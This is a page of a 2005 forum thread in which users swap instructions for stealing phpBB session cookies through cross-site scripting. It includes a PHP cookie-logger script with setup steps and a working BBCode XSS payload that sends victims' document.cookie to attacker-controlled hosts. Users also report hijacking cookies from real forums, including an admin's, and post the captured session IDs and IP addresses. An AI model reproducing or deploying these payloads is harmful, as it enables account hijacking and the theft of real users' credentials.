 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
|
 |
 Posted: Fri Jul 29, 2005 4:26 pm |
 |
|
| diegocure15 |
| Active user |
 |
|
| Joined: Sep 22, 2004 |
| Posts: 27 |
|
|
|
 |
|
 |
|
i just wrote about it!!!!!!
and some other people have, you just have to read dont be lazy!
this next code copy it and save it as cookie.php upload it thru yous ftp
| Quote: | <?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '<br>Cookie: '.$cookie.'</br> IP: ' .$ip. '<br> Date and Time: ' .$date. '</br> Referer: '.$referer.' ');
fclose($fp);
?> |
Now open your notepad and create a file call steal.php with nothing in it just name the file steal.php and upload it thru your ftp too once its on your rooot next to cookies.php or on the same path right click on steal.php and attributes (CHMOOD) or something like that and give it 777 permision and thats it.
if you try it in a forum and the cookie does not show on your steal.php fiule is cuz that forum is not vul,hope you understand this time,seeya. |
|
|
|
|
|
|
|
|
| Posted: Fri Jul 29, 2005 5:36 pm |
|
|
| discordia |
| Beginner |
 |
|
| Joined: Jun 20, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| diegocure15 wrote: | | Armageddon85 wrote: | I perfectly understand the second part to this exploit - thanks to the video... but now i dont understand the first.
does the script go on a file in your website with chmod at 777?
if so does anyone know webhosting service for free that has that ability.
all the ones i have signed up for have a "quick and easy" file management system. |
www.lycos.com and just have to upload the cookie script normally and the create a file with chmod on the same path and give it 777 mod. |
I couldn't find what you speak of at Lycos, did you mean Angelfire? It lycos sponsor site?
At Angelfire, I cannot change the file permissions, it says the server does not support this. Are there any other free servers that do? |
|
Last edited by discordia on Fri Jul 29, 2005 8:24 pm; edited 1 time in total |
|
|
|
|
|
|
|
| Posted: Fri Jul 29, 2005 7:24 pm |
|
|
| 700G |
| Active user |
|
|
| Joined: Mar 25, 2005 |
| Posts: 33 |
|
|
|
|
|
|
|
| You can also just leave the URL as is "http://antichat.ru/cgi-bin/s.jpg" and then go to: "http://antichat.ru/sniff/log.php" to view your cookies. |
|
|
|
|
| Posted: Sun Jul 31, 2005 2:54 pm |
|
|
| Gandrasss |
| Beginner |
|
|
| Joined: Jul 31, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
In The Cookie.txt file i find this kode phpbb2mysql_data=a:0:{}; phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"8\";}; phpbb2mysql_sid=abfc72e6fa2af4238d4568560900beae; phpbb2mysql_t=a:1:{i:1681;i:1122816363;}
that is password |
|
|
|
|
| Posted: Mon Aug 01, 2005 8:35 am |
|
|
| OnlyMe |
| Beginner |
|
|
| Joined: Aug 01, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
not working for me..dot know..which is exact code is working..anyone assist me..sebzero..please? give me the code.
regards |
|
|
|
|
|
chmod answer |
|
| Posted: Mon Aug 01, 2005 1:48 pm |
|
|
| Noob |
| Beginner |
|
|
| Joined: Aug 01, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
when your in whatever ftp program you wanna use, after you upload the pages you created to the Server Domain, refresh your screen and right click on the files you just ftp'd and you see a option for set attributes. You will want to make sure all options are checked giving the files permission to run as a program script ON the server. Setting CHMOD Permissions is basically telling the server what the files are and arent allowed to do on your domain. 777 by default gives the files permission to do everything possible.
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://area51portal.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' |
|
|
|
|
| Posted: Mon Aug 01, 2005 8:29 pm |
|
|
| Gandrasss |
| Beginner |
|
|
| Joined: Jul 31, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| that is password abfc72e6fa2af4238d4568560900beae |
|
|
|
|
| Posted: Tue Aug 02, 2005 1:09 pm |
|
|
| Umuxai |
| Beginner |
|
|
| Joined: Aug 02, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong  |
|
|
|
|
| Posted: Tue Aug 02, 2005 3:01 pm |
|
|
| Beat |
| Beginner |
|
|
| Joined: Jul 29, 2005 |
| Posts: 4 |
|
|
|
|
|
|
|
| Umuxai wrote: | | Is it possible to steal the whole cookies.txt file form IE with this method? As far as I remember IE is protecting this file... but I can be wrong |
There is no such thing as "cookies.txt" with IE |
|
|
|
|
| Posted: Wed Aug 03, 2005 2:02 pm |
|
|
| Umuxai |
| Beginner |
|
|
| Joined: Aug 02, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
Oh yes... you are right  I forgot about it...
Is there any possibility to find out what cookies have user in his browser? |
|
|
|
|
|
|
|
|
| Posted: Thu Aug 04, 2005 12:50 am |
|
|
| darkclaw |
| Regular user |
|
|
| Joined: Aug 04, 2005 |
| Posts: 14 |
|
|
|
|
|
|
|
Sorry, i dont know if i am doing something wrong, but my cookies.php is like this:
| Quote: | <?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?> |
I post a reply in the forum with this in the msg:
| Quote: | | [url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://darkclaw.ionichost.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' |
I uploaded cookies.php and cookies.txt to server. Chmoded cookies.txt to 777. But my cookies.txt is like this:
Cookie:
IP: ???.???.???.???
Date and Time: 3 August, 2005, 9:42 pm
Referer: referer page here
There is nothing after Cookie: !!
What am i doing wrong ? |
|
|
|
|
|
|
|
|
| Posted: Thu Aug 04, 2005 4:23 am |
|
|
| diegocure15 |
| Active user |
|
|
| Joined: Sep 22, 2004 |
| Posts: 27 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Fri Aug 05, 2005 1:31 pm |
|
|
| DI1 |
| Beginner |
|
|
| Joined: Aug 05, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
I tried it on some forum with 2.0.16 and I got it worked for a normal user. but then I got the cookie from the admin, but it seems it doesn't have a password hash 
| Code: | | <br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";i:-1;}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7</br> IP: 212.78.204.27<br> Date and Time: 5 August, 2005, 3:02 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135 <br>Cookie: phpbb2mysql_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:1:\"3\";}; SamMar_forum_sid=3944130a0e2ac0db92619a6c40b003d7; SamMar_forum_t=a:4:{i:1448;i:1123246990;i:1646;i:1123247028;i:1680;i:1123247054;i:39;i:1123247060;}</br> IP: ************<br> Date and Time: 5 August, 2005, 3:04 pm</br> Referer: http://www.checkedforum.com/forum/viewtopic.php?t=40&start=135 |
|
|
|
|
|
|
|
|
|
| Posted: Fri Aug 05, 2005 4:17 pm |
|
|
| Beat |
| Beginner |
|
|
| Joined: Jul 29, 2005 |
| Posts: 4 |
|
|
|
|
|
|
|
| diegocure15 wrote: | | forum has been patched. |
|
|
|
|
|
| Posted: Fri Aug 05, 2005 4:44 pm |
|
|
| DI1 |
| Beginner |
|
|
| Joined: Aug 05, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
but I can still hack normal users. for those users a hashfile is given.
and the forum is still 2.0.16 |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 6 of 8
Goto page Previous1, 2, 3, 4, 5, 6, 7, 8Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 228
Members: 0
Total: 228
